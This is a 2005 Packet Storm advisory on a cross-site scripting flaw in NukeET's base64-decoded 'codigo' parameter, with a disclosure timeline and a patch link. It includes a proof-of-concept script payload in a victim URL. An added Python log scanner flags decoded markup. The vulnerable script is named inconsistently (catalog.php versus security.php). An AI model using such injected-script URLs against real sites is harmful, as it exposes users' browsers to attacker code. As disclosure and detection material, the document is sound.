NukeETXSS.txt

2005-08-07T00:00:00
ID PACKETSTORM:39126
Type packetstorm
Reporter Lostmon
Modified 2005-08-07T00:00:00

Description

                                        
################################################
NukeET 'codigo' variable cross site scripting  
vendor url: http://www.truzone.org
advisory: http://lostmon.blogspot.com/2005/05/nukeet-codigo-variable-cross-site.html
Vendor confirmed: yes   exploit available: yes
#################################################  
  
NukeET contains a flaw that allows a remote cross-site scripting
attack. This flaw exists because the application does not validate
the 'codigo' variable upon submission to the 'catalog.php' script. This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server, leading to a loss
of integrity.

Bug found by Suko, investigated and reported by Lostmon.
  
##########  
versions  
##########  
  
Versions prior to 3.2 are affected.
  
##########  
solution:  
##########  
  
vendor patch  
  
http://www.truzone.org/modules.php?name=Projet&op=getit&iddow=77  
  
###########  
timeline  
###########  
  
discovered: 9 may 2005  
vendor notify: 9 may 2005  
vendor response : 10 may 2005  
vendor fix: 10 may 2005  
disclosure: 10 may 2005  
  
  
##########  
exploit:  
##########  
  
The 'codigo' variable accepts base64-encoded input in the URL. If we encode, for example,
  
<script>alert()</script><h1>XSS PoW@ !!!</h1>  
  
in base64 this is:  
  
PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+PGgxPlhTUyBQb1dAICEhITwvaDE+  
  
If we add this base64 code, the alert and the h1 tag are executed without
any problem.
http://[victim]/security.php?codigo=PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+PGgxPlhTUyBQb1dAICEhITwvaDE+
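
Added example, not part of the original advisory: a log check for the behaviour described above, which decodes each 'codigo' query value as base64 and flags requests whose decoded content contains HTML markup. The log lines, client addresses, the /index.php path and the function names are constructed for illustration; the encoded value is the one quoted in this advisory.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qsl

# Coarse heuristic: an opening or closing HTML tag inside the decoded value.
MARKUP = re.compile(rb"<\s*/?\s*[a-z!]", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def decode_codigo(value):
    """Return the decoded bytes of a 'codigo' value, or None if it is not base64."""
    # parse_qsl turns a literal '+' into a space; base64 uses '+', so undo that.
    value = value.replace(" ", "+")
    value += "=" * (-len(value) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None


def suspicious_requests(log_lines):
    """Yield (path, decoded_text) for requests whose decoded 'codigo' holds markup."""
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key != "codigo":
                continue
            decoded = decode_codigo(value)
            if decoded and MARKUP.search(decoded):
                yield url.path, decoded.decode("latin-1")


# Constructed access-log lines; addresses are from a documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/May/2005:10:00:00 +0000] "GET /security.php?codigo=MTIzNDU= HTTP/1.1" 200 512',
    '192.0.2.11 - - [10/May/2005:10:00:05 +0000] "GET /security.php?codigo='
    'PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+PGgxPlhTUyBQb1dAICEhITwvaDE+ HTTP/1.1" 200 812',
    '192.0.2.12 - - [10/May/2005:10:00:09 +0000] "GET /index.php?codigo=%%% HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for path, text in suspicious_requests(SAMPLE_LOG):
        print(f"possible XSS via codigo on {path}: {text!r}")
```

Scanning the raw query string for "<script" would miss these requests, because the markup only appears after the base64 decoding step.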
  
  
################ End ##################  
  
thnx to estrella for being my light
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
thnx to Suko "patience is a virtue, little Jedi"
  
--  
Sincerely:
  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Data Mangler of: http://www.osvdb.org  
--  
Curiosity is what makes the mind move....